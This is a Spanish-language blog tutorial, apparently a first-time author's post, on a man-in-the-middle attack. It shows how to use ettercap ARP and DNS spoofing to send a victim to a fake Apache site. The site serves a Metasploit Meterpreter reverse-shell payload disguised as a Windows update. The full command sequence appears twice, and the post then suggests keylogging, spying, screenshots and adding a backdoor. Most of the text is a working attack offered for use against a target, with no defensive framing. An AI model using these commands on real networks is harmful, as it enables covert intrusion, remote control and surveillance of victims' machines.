Man In The Middle (MITM) Attack : ettercap, metasploit
¿Qué es esto?Con la creación de un sitio Web falso, que con un poco de ingeñieria social obtendriamos el acceso a la línea de comandos para PC nuestro objetivo.
¿Cómo funciona esto?
> Ettercap para realizar el ataque MITM
> Metasploit para la explotación
> Apache para el servidor web
¿Qué necesito?
> Ettercap
> Metasploit
> Servidor Web
Aca va un video:
Attack: Man In The Middle (MITM) | g0tmi1k
Para descargar:
http://www.mediafire.com/?x5xt4nkgjtn
Aca los comandos del video pero mejorado por mi
Citar
#Exploit Reverse Tcp
nano /usr/share/ettercap/etter.dns
sh -c "start-apache"
y si no te funciona tenes
/etc/init.d/apache2 start
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=IP (Internet Protocol) X > /var/www/Windows-KB174529-x86-ENU.exe
,/msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP (Internet Protocol) -ifconfig-
exploit
ettercap -T -Q -P dns_spoof -M arp // // -i eth0
shell
Y ahi después hacen lo que se les cante
keylloger,espia,screenshot y etc....
nano /usr/share/ettercap/etter.dns
sh -c "start-apache"
y si no te funciona tenes
/etc/init.d/apache2 start
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=IP (Internet Protocol) X > /var/www/Windows-KB174529-x86-ENU.exe
,/msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP (Internet Protocol) -ifconfig-
exploit
ettercap -T -Q -P dns_spoof -M arp // // -i eth0
shell
Y ahi después hacen lo que se les cante
keylloger,espia,screenshot y etc....
Fuente: http://forums.remote-exploit.org
PD: Es mi primer tutorial asi que cualquiera error es por ser la primera vez xD, también se puede meter SBD (Secure BackDoor) pero eso ya depende de cada uno
Salu2
0 comentarios:
Publicar un comentario